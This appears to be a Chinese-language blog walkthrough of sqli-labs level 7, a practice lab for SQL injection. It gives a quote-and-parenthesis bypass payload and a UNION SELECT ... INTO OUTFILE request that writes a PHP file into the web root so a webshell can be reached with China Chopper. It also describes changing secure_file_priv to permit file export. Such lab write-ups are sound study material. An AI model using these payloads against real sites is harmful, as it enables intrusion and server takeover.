sqli-labs第七关

 在第五六关卡了好几天,终于走到第七关了,首先查看源代码可以看到,SQL查询语句为SELECT *   FROM users WHERE id=(('3' )) -- ')) LIMIT 0,1

         于是构造绕过语句 192.168.18.136/sqli-labs-master/Less-7/?id=3' ))  --+

sqli-labs第七关_第1张图片

    接下来,我们发现 union 1,2,3一点用都没有

sqli-labs第七关_第2张图片

查看攻略得知,此题要用到 into outfile函数,大概意识就是用outfile构建一句话木马,然后用中国菜刀连接,拿到webshell,利用into outfile构建一句话,如图

sqli-labs第七关_第3张图片

但这里还有个很重要的点要说明,我用  http://IP/sqli-labs-master/Less-7/id=1')) union select 1,2,'' into outfile 'C:\\Users\\root\\Desktop\\phpstudy\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\a.php' -- +写了不知道多少次,一直没成功,后来发现是权限不够,于是 修改my.ini 在[mysqld]内加入secure_file_priv="/"。所以才会显示C:\.

sqli-labs第七关_第4张图片

  一般来说,刚开始这里是显示null,表示不支持导入导出,所以要将这里更改,如图我的改成了C:\,

已经构建成功

sqli-labs第七关_第5张图片

    sqli-labs第七关_第6张图片

  然后用中国菜刀连接sqli-labs第七关_第7张图片

  在这一讲里面一直有个东西不理解,就是每次都能成功写入,但每次页面都会回馈我一个语法错误的情况

sqli-labs第七关_第8张图片

  如果有大佬路过,烦请解释一下

你可能感兴趣的:(sqli-labs靶场,mysql,web安全)